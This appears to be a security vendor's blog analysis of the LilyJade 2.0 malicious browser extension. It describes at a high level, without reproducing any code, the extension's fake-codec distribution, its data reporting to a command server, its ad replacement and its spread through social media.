LilyJade Version 2.0 – Malicious Browser Extension
In Market, there are different web browsers available, in order to gain the popularity and more usability of these browsers among the users requires some extra features apart from just merely being used to browse web. In hence, they introduce some extra feature to their browsers one among that is the browser plug-in which the browser’s can use in-order to attract more audience.
These Extensions are used in the browser to extend its functionality. Almost all popular browsers support these extensions and have become one of the most commonly used malware attack vectors. They choose social networking sites as their favourite breeding ground.
This is how it begins:
Figure 1: Fake YouTube Site
We came across a scam, where it tricks the user to install fake video codec extension to view the video. When users install these kinds of malicious extensions, their system will be vulnerable for attacks. During our research we found that, the new malicious browser extension installed to the browser as a fake video codec update will be active. When browser is opened, this extension is loaded to download the malicious java-scripts from the remote server to perform malicious activities.
When this malicious extension get installed to the browser, its security is compromised. These malicious extensions will send the below mentioned information to the malware author some of them are IP address, Country and OS installed. In addition to this, it will update the malware author whether the user is online or not along with the websites viewed by the compromised user.
Figure 3: C&C Server
The above statistics shows around 7837 compromised unique IP’s and among that around 176 users were online.
The other fields present in the C&C server are:
- IP – IP address of the compromised browser.
- Country – Location of the compromised browser.
- OS – Operating System installed in the system.
- URL – The web-page which is being currently viewed in the compromised browser.
- Status – Whether the compromised browser is available or not.
They enumerate the advertisement from following websites (Yahoo, YouTube, Bing, AOL, Google and Facebook) and replace it with their own advertisements. AdSense ID (In this case “ca-pub-33xx398xxxx84xx1”) is unique for each AdSense user. Replacing advertisement with his unique AdSense ID will generate more income to the attacker’s account.
Figure 4: Function to Replace Ads
Apart from the above mentioned domains they also replace advertisement in other websites too. The malicious script will check the user viewing pages contain any porn content by comparing the listed keywords below. If the match is found it won’t replace the ads in that webpage. Because displaying advertisement in porn or hacking websites using Google AdSense will lead to account ban.
Figure 5: Checking whether the website has Porn content
The cyber criminals have a service for selling likes in Facebook. They target mainly on some small companies, games or any application that needs more visibility and fans in Facebook. This malicious script also promotes some facebook pages.
Figure 6: Promoting the Pages in Facebook
The above page belongs to an affiliate, who spread this malicious extension. He has got more than 5000 likes in last three weeks. This speaks about the tenure of this malware available in the market in this case it live since three weeks.
This version of lilyJade spreads through facebook and twitter by posting the scam messages from the compromised account. Below code clearly shows its propagation technique.
Figure 7: Propagation Through Scam’s
This version of lilyjade support only Firefox, Chrome and Safari browsers. This Analysis is based on the Firefox extension which is not a part of cross rider framework.
Facebook partnered with McAfee to detect these types of malicious extensions,If any facebook users suspect that they are infected then they can checkpoint with McAfee Scan and Repair.